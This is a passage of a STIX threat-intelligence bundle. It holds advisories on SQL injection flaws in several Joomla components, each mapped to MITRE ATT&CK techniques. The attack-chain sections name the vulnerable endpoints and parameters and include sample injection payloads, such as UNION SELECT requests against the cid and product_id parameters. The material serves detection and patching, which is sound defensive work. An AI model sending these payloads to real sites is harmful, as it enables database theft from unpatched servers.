Exfiltration**: The web server returns the results of the executed SQL query as part of the HTTP response, allowing the attacker to extract sensitive information from the database (e.g., table names, column data, user credentials).\n7.  **Impact**: Attacker gains unauthorized access to sensitive data, potentially leading to further compromise of the web application or associated systems.\n\n## Impact\n\nThe successful exploitation of CVE-2017-20256 can lead to severe consequences for affected organizations. Unauthenticated attackers can extract any data stored in the Joomla database, including user account details, administrative credentials, session tokens, and sensitive organizational information. This information can then be used for further attacks, such as account takeover, defacement, or lateral movement within the network. While specific victim counts are not available, any organization utilizing Joomla with the unpatched Survey Force Deluxe component 3.2.4 or earlier is at risk of significant data breaches and reputational damage.\n\n## Recommendation\n\n*   **Patch CVE-2017-20256**: Immediately upgrade Joomla Survey Force Deluxe to a version higher than 3.2.4 or disable the component if an upgrade is not feasible, to remediate CVE-2017-20256.\n*   **Deploy Sigma Rules**: Deploy the provided Sigma rules (`Detect CVE-2017-20256 Exploitation - Generic SQLi in Query` and `Detect CVE-2017-20256 Exploitation - invite Parameter SQLi`) to your web server/WAF logs to detect exploitation attempts.\n*   **Web Application Firewall (WAF) Configuration**: Configure your WAF to detect and block common SQL injection patterns, especially those targeting GET request parameters like `invite`.\n*   **Review Web Server Logs**: Regularly review web server logs for suspicious GET requests containing SQL injection syntax, especially those directed at Joomla components.\n",
      "published": "2026-06-19T16:25:10Z",
      "labels": [
        "sql-injection",
        "joomla",
        "web-application",
        "vulnerability",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-20256"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/42606"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-survey-force-deluxe-sql-injection-via-invite-parameter"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--080daa47-d7e7-586a-9112-a0663ed7bab6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5245b848-1804-5e7c-b739-c2d1c067bba6",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--43d8d3e8-9e91-5085-8b8e-d939ae18b3ce",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5245b848-1804-5e7c-b739-c2d1c067bba6",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6ef3c5ca-94f5-57f2-924a-8c2f91b71d40",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over Alternative Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1048",
          "url": "https://attack.mitre.org/techniques/T1048"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f1bd0716-2456-5eec-a293-26e44c3145bb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--5245b848-1804-5e7c-b739-c2d1c067bba6",
      "target_ref": "attack-pattern--6ef3c5ca-94f5-57f2-924a-8c2f91b71d40"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--5245b848-1804-5e7c-b739-c2d1c067bba6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2017-20257: Joomla! Component Quiz Deluxe SQL Injection",
      "description": "## Overview\n\nCVE-2017-20257 describes an unauthenticated SQL injection vulnerability affecting the Joomla! Component Quiz Deluxe version 3.7.4. This critical flaw allows remote attackers to execute arbitrary SQL commands against the backend database. Attackers achieve this by injecting malicious SQL code into specific parameters (`stu_quiz_id` or `flag_quest`) when making requests to the `ajaxaction.flag_question` task within the component. The vulnerability's re-publication or update in the NVD on 2026-06-19 highlights its continued relevance. Successful exploitation could lead to full database compromise, including sensitive data exfiltration, data manipulation, and potentially further compromise of the web application.\n\n## Attack Chain\n\n1. An unauthenticated attacker identifies a public-facing Joomla! instance running the vulnerable Quiz Deluxe component version 3.7.4.\n2. The attacker crafts a specially designed HTTP GET or POST request targeting the `/index.php` endpoint with the `option=com_quizdeluxe\u0026task=ajaxaction.flag_question` parameters.\n3. Malicious SQL payloads, such as `' OR 1=1--` or `UNION SELECT ...`, are injected into either the `stu_quiz_id` or `flag_quest` parameters within the HTTP request.\n4. The vulnerable Quiz Deluxe component processes the request without proper input sanitization, leading to the execution of the embedded SQL commands on the backend database.\n5. The attacker observes the web server's response for error messages, altered content, or retrieved data, confirming successful injection.\n6. Through iterative exploitation, the attacker manipulates database queries to extract sensitive information, such as user credentials, personal identifiable information (PII), or internal application data.\n7. The attacker may also use the SQL injection to modify database records, potentially leading to website defacement, privilege escalation, or further compromise of the web application.\n\n## Impact\n\nSuccessful exploitation of CVE-2017-20257 grants unauthenticated attackers the ability to execute arbitrary SQL commands, severely compromising the integrity and confidentiality of the application's database. This directly leads to the exfiltration of sensitive information, including user credentials, proprietary business data, or personally identifiable information (PII) of customers. Attackers can also manipulate existing data, causing data integrity issues or unauthorized content changes on the Joomla! site. Organizations utilizing the affected component version face significant risks of severe data breaches, reputational damage, and potential regulatory compliance violations.\n\n## Recommendation\n\n* Immediately patch or upgrade the Joomla! Component Quiz Deluxe to a version greater than 3.7.4 to remediate CVE-2017-20257.\n* Deploy the Sigma rules in this brief to your web application firewall (WAF) or SIEM to detect exploitation attempts targeting `ajaxaction.flag_question`.\n* Ensure web server logging (e.g., Apache access logs, Nginx access logs, IIS logs) captures full HTTP request details including URL paths and query parameters to enable detection of SQL injection attempts.\n* Implement robust input validation and parameterized queries in all web applications to prevent similar SQL injection vulnerabilities.\n",
      "published": "2026-06-19T16:26:40Z",
      "labels": [
        "sql-injection",
        "web-application",
        "joomla",
        "cve",
        "data-exfiltration"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--6ef3c5ca-94f5-57f2-924a-8c2f91b71d40"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-20257"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/42589"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-component-quiz-deluxe-sql-injection"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f92f9394-a479-5f76-bb2b-2417d6f2cdd9",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c3c5fc96-f4c5-5083-9729-422e57a39c52",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--10b922b5-d71d-5536-b661-fa242ef63958",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--c3c5fc96-f4c5-5083-9729-422e57a39c52",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--c3c5fc96-f4c5-5083-9729-422e57a39c52",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Joomla! Component RPC Responsive Portfolio 1.6.1 SQL Injection (CVE-2017-20258)",
      "description": "## Overview\n\nA critical SQL injection vulnerability, identified as CVE-2017-20258, affects Joomla! Component RPC Responsive Portfolio version 1.6.1. This flaw enables unauthenticated attackers to execute arbitrary SQL queries against the backend database. By crafting specific HTTP GET requests to `index.php`, incorporating `option=com_pofos\u0026view=pofo` along with malicious SQL payloads injected into the `id` parameter, threat actors can bypass authentication mechanisms. This exploitation allows for the unauthorized extraction of sensitive information, such as user credentials, system configurations, or proprietary data, posing a severe data breach risk. The vulnerability, first published on June 19, 2026, impacts all organizations utilizing the specified version of this Joomla! component.\n\n## Attack Chain\n\n1. An unauthenticated attacker identifies a public-facing web server hosting Joomla! and the vulnerable RPC Responsive Portfolio component version 1.6.1.\n2. The attacker crafts an HTTP GET request targeting the `index.php` path, specifying the vulnerable component parameters: `option=com_pofos` and `view=pofo`.\n3. A crafted SQL injection payload, such as `id=' OR 1=1--` or similar data exfiltration statements, is embedded within the `id` parameter of the GET request.\n4. The web server receives the request and forwards it to the Joomla! application, which processes the RPC Responsive Portfolio component's logic.\n5. Due to improper input validation, the vulnerable component concatenates the malicious `id` parameter value directly into an SQL query executed against the application's database.\n6. The database executes the attacker-controlled SQL query, resulting in the retrieval of sensitive information beyond what is authorized for unauthenticated access.\n7. The Joomla! application's HTTP response includes the results of the executed SQL query, returning the exfiltrated sensitive data to the attacker.\n8. The attacker then parses the received HTTP response to collect and analyze the confidential database information, achieving their objective of unauthorized data disclosure.\n\n## Impact\n\nSuccessful exploitation of CVE-2017-20258 can lead to a severe data breach, compromising the confidentiality of an organization's database. Attackers can extract various forms of sensitive information, including user account details, passwords, proprietary business data, and internal system configurations. Such exfiltration can result in significant financial losses from regulatory penalties and remediation efforts, severe damage to reputation, and potential for further downstream attacks leveraging the stolen data. While specific victim numbers or affected sectors are not detailed in the advisory, any entity running the vulnerable Joomla! component is exposed to these critical risks.\n\n## Recommendation\n\n*   Prioritize patching or upgrading the Joomla! Component RPC Responsive Portfolio to a version that remediates CVE-2017-20258 immediately upon availability.\n*   Deploy the provided Sigma rule \"Detect CVE-2017-20258 Joomla! SQL Injection Attempt\" to your SIEM/detection platform to identify and alert on attempted exploitation.\n*   Implement or strengthen Web Application Firewall (WAF) policies to detect and block common SQL injection patterns, specifically targeting the `id` parameter in requests to `index.php?option=com_pofos\u0026view=pofo`.\n*   Regularly review web server access logs for suspicious requests matching the URL pattern `index.php?option=com_pofos\u0026view=pofo\u0026id=[SQL]` as identified in the IOCs section.\n",
      "published": "2026-06-19T16:28:07Z",
      "labels": [
        "sql-injection",
        "web-vulnerability",
        "joomla",
        "cve",
        "data-exfiltration"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-20258"
        },
        {
          "source_name": "reference",
          "url": "https://extensions.joomla.org/extension/rpc-responsive-portfolio/"
        },
        {
          "source_name": "reference",
          "url": "https://extro.media/"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/42564"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-component-rpc-responsive-portfolio-sql-injection"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--352e922c-23b5-5379-897c-2a06e8bfdf71",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ef1d12f5-aeec-59d1-9ab6-2e7170ff7d0d",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1059",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--ef3736a9-abe3-57fa-9abc-a8089998c748",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ef1d12f5-aeec-59d1-9ab6-2e7170ff7d0d",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9c5c076e-d020-54cf-ab08-b18315abadea",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--ef1d12f5-aeec-59d1-9ab6-2e7170ff7d0d",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--ef1d12f5-aeec-59d1-9ab6-2e7170ff7d0d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Joomla OSDownloads SQL Injection (CVE-2017-20259)",
      "description": "## Overview\n\nJoomla OSDownloads version 1.7.4 is affected by a critical SQL injection vulnerability, tracked as CVE-2017-20259. This flaw allows unauthenticated attackers to execute arbitrary SQL queries against the underlying database. Exploitation involves sending a specially crafted HTTP GET request to `index.php` with the `option=com_osdownloads\u0026view=item\u0026id=[SQL]` parameters, where malicious SQL code is injected into the `id` parameter. This vulnerability, disclosed in 2017 but recently published by NVD, poses a significant risk as it enables attackers to extract sensitive database information, including user credentials, configuration settings, and other proprietary data, leading to potential data breaches and further system compromise. The high CVSS score reflects the ease of exploitation and severe impact.\n\n## Attack Chain\n\n1. An unauthenticated attacker identifies a public-facing Joomla installation running a vulnerable version (1.7.4) of the OSDownloads component.\n2. The attacker crafts a malicious HTTP GET request targeting the `index.php` endpoint of the Joomla application.\n3. The crafted request includes specific query parameters: `option=com_osdownloads` and `view=item`.\n4. Malicious SQL code, designed for injection, is appended to the `id` parameter within the GET request (e.g., `id=1 UNION SELECT ...`).\n5. The vulnerable Joomla OSDownloads component processes the request without properly sanitizing the `id` parameter, leading to the execution of the injected SQL query on the backend database.\n6. The attacker iterates on the injected queries to extract sensitive database schema information, such as table names and column structures, and then specific data.\n7. Confidential data, including user credentials, API keys, and system configuration details, is retrieved from the database and returned in the HTTP response body.\n8. This exfiltrated information can then be leveraged by the attacker to gain unauthorized administrative access to the Joomla application or other connected systems, leading to further compromise.\n\n## Impact\n\nSuccessful exploitation of CVE-2017-20259 allows unauthenticated attackers to compromise the confidentiality and integrity of the Joomla application's database. Attackers can extract highly sensitive information, such as administrator credentials, user data, and system configuration details. This data can then be used to gain unauthorized access to the Joomla backend, deface the website, inject malicious content, or pivot to other systems within the network. The exfiltration of user credentials or proprietary business data can lead to severe reputational damage, financial losses, and regulatory non-compliance for affected organizations.\n\n## Recommendation\n\n*   Patch Joomla OSDownloads to a version greater than 1.7.4 immediately to remediate CVE-2017-20259.\n*   Deploy the Sigma rules in this brief to your SIEM and tune for your environment to detect exploitation attempts against CVE-2017-20259.\n*   Enable comprehensive web server access logging to capture full HTTP request details, including query parameters, to facilitate detection of SQL injection attempts.\n*   Implement a Web Application Firewall (WAF) to filter and block malicious SQL injection patterns in incoming HTTP requests.\n",
      "published": "2026-06-19T16:29:39Z",
      "labels": [
        "sql-injection",
        "web-vulnerability",
        "joomla",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-20259"
        },
        {
          "source_name": "reference",
          "url": "https://extensions.joomla.org/extensions/extension/directory-a-documentation/downloads/osdownloads/"
        },
        {
          "source_name": "reference",
          "url": "https://joomlashack.com/"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/42561"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-osdownloads-sql-injection-via-item-view"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c8d80a6e-6a15-5b66-aba9-f5cd8d061813",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--51306ebd-2fc7-57b5-8902-18304f521896",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--54dd62b5-b60b-5f79-ba49-af9229c12b9c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--51306ebd-2fc7-57b5-8902-18304f521896",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--51306ebd-2fc7-57b5-8902-18304f521896",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2017-20261: Joomla! Bargain Product VM3 SQL Injection Vulnerability",
      "description": "## Overview\n\nCVE-2017-20261 describes a high-severity SQL injection vulnerability affecting Joomla! Component Bargain Product VM3 version 1.0. This flaw allows unauthenticated remote attackers to execute arbitrary SQL queries against the backend database. Attackers achieve this by crafting malicious HTTP GET requests and injecting SQL code through the `product_id` parameter. Specifically, the vulnerability manifests in the component's `brainy` and `alice` views. Successful exploitation can lead to the extraction of sensitive database information, including but not limited to user credentials, system configurations, and proprietary application data, posing a significant risk to data confidentiality. This vulnerability is present in an older component, but still poses a risk if unpatched systems are exposed.\n\n## Attack Chain\n\n1.  Attacker identifies an internet-facing Joomla! instance running the vulnerable Bargain Product VM3 1.0 component, often through reconnaissance or automated scanning.\n2.  The attacker crafts a malicious HTTP GET request targeting a vulnerable view, such as `/index.php?option=com_bargainproduct\u0026view=brainy`.\n3.  An SQL injection payload is embedded within the `product_id` parameter of the GET request (e.g., `product_id=1%20UNION%20SELECT%20NULL,user(),NULL,NULL--`).\n4.  The vulnerable Joomla! component processes the request, incorrectly parsing the `product_id` parameter and executing the injected SQL query against the underlying database.\n5.  The attacker observes the HTTP response, which now contains output from the executed SQL query, allowing them to extract sensitive database information.\n6.  Through iterative SQL injection, the attacker can systematically exfiltrate various tables, credentials, or other data from the database.\n\n## Impact\n\nSuccessful exploitation of CVE-2017-20261 grants unauthenticated attackers the ability to execute arbitrary SQL queries. The primary observed impact is the extraction of sensitive database information, leading to significant data breaches. This can compromise customer data, internal application logic, and potentially administrative credentials, allowing for further access to the compromised system or connected infrastructure. While the NVD advisory specifically highlights data extraction, arbitrary SQL query execution inherently carries the risk of data modification or deletion, leading to data integrity and availability issues.\n\n## Recommendation\n\n*   Prioritize patching or removing the Joomla! Component Bargain Product VM3 1.0 immediately to mitigate CVE-2017-20261.\n*   Deploy the Sigma rules in this brief to your SIEM and tune them for your environment to detect exploitation attempts.\n*   Enable comprehensive web server access logging, ensuring `cs-uri-stem` and `cs-uri-query` are captured for all HTTP requests to aid in detecting injection attempts.\n*   Regularly review web server access logs for anomalous requests containing SQL injection patterns, as described in the provided detection rules.\n",
      "published": "2026-06-19T16:31:45Z",
      "labels": [
        "sql-injection",
        "joomla",
        "web-application",
        "cve",
        "data-exfiltration"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-20261"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/42552"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-component-bargain-product-vm3-sql-injection"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3abf6c3e-1463-5eb8-8fe9-114abd992108",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f7de42bb-3463-5ae7-81b2-5151dcfaef66",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--eb2f7039-83a6-5e78-8bf6-6b0dd5111c5b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f7de42bb-3463-5ae7-81b2-5151dcfaef66",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--55190cce-3978-5d43-b6a3-64cdd80a5d56",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "T1588",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1588",
          "url": "https://attack.mitre.org/techniques/T1588"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a8baa68f-9cc4-5865-bfaf-204ccaf05a03",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f7de42bb-3463-5ae7-81b2-5151dcfaef66",
      "target_ref": "attack-pattern--55190cce-3978-5d43-b6a3-64cdd80a5d56"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f7de42bb-3463-5ae7-81b2-5151dcfaef66",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CVE-2017-20262 — Joomla! Component Ajax Quiz SQL Injection",
      "description": "## Overview\n\nCVE-2017-20262 details an unauthenticated SQL injection vulnerability affecting Joomla! Component Ajax Quiz version 1.8. Threat actors can exploit this weakness by crafting specific GET requests to the `index.php` endpoint, utilizing the `option=com_ajaxquiz` and `view=ajaxquiz` parameters. By injecting malicious SQL code into the `cid` parameter, attackers can execute arbitrary SQL queries on the underlying database. This allows for the extraction of sensitive database information, including table names, column structures, and potentially confidential data, posing a significant risk to data confidentiality and integrity. The vulnerability stems from improper neutralization of special elements used in SQL commands.\n\n## Attack Chain\n\n1.  **Reconnaissance \u0026 Target Identification**: Attacker identifies a Joomla! instance running the vulnerable Ajax Quiz component version 1.8, often through automated scanning or public information.\n2.  **Vulnerability Discovery**: Attacker identifies the `cid` parameter in GET requests to `index.php?option=com_ajaxquiz\u0026view=ajaxquiz` as a potential SQL injection point, either by probing or using known exploit patterns.\n3.  **Initial SQL Injection**: Attacker crafts a malicious GET request, such as `GET /index.php?option=com_ajaxquiz\u0026view=ajaxquiz\u0026cid=1%20UNION%20SELECT%20NULL,user()--+`, injecting an SQL payload into the `cid` parameter.\n4.  **Arbitrary Query Execution**: The vulnerable component processes the request without properly sanitizing the `cid` parameter, leading to the execution of the injected SQL query by the backend database.\n5.  **Database Schema Enumeration**: Attacker sends follow-up requests with increasingly complex SQL payloads to enumerate database metadata, including table names and column structures, typically using `information_schema` or similar system tables.\n6.  **Sensitive Data Exfiltration**: Using the obtained database schema, the attacker crafts further SQL queries to extract sensitive information, such as user credentials, personal data, or proprietary business data from specific tables.\n7.  **Impact**: Compromised sensitive data is extracted from the database, leading to potential data breaches, unauthorized access, and further exploitation of the affected organization.\n\n## Impact\n\nSuccessful exploitation of CVE-2017-20262 grants unauthenticated attackers the ability to execute arbitrary SQL queries on the backend database. This directly leads to the compromise of sensitive information, such as user data, authentication credentials, and proprietary business logic stored within the database. The exfiltration of such data can result in significant financial losses, reputational damage, regulatory penalties, and potential for further unauthorized access to other systems or accounts, severely impacting the affected organization and its customers.\n\n## Recommendation\n\n*   Immediately update or disable the Joomla! Component Ajax Quiz 1.8 as described in CVE-2017-20262 to prevent exploitation.\n*   Deploy the Sigma rule \"Detects CVE-2017-20262 Exploitation — Joomla! Ajax Quiz SQL Injection\" to your SIEM to identify active exploitation attempts against your web servers.\n*   Enable comprehensive web server logging (category `webserver`) to ensure visibility into HTTP requests, including full URI-stem and URI-query fields, for proper detection rule activation.\n",
      "published": "2026-06-19T16:32:55Z",
      "labels": [
        "sql-injection",
        "web-vulnerability",
        "joomla",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--55190cce-3978-5d43-b6a3-64cdd80a5d56"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-20262"
        },
        {
          "source_name": "reference",
          "url": "https://www.exploit-db.com/exploits/42532"
        },
        {
          "source_name": "reference",
          "url": "https://www.vulncheck.com/advisories/joomla-component-ajax-quiz-sql-injection"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
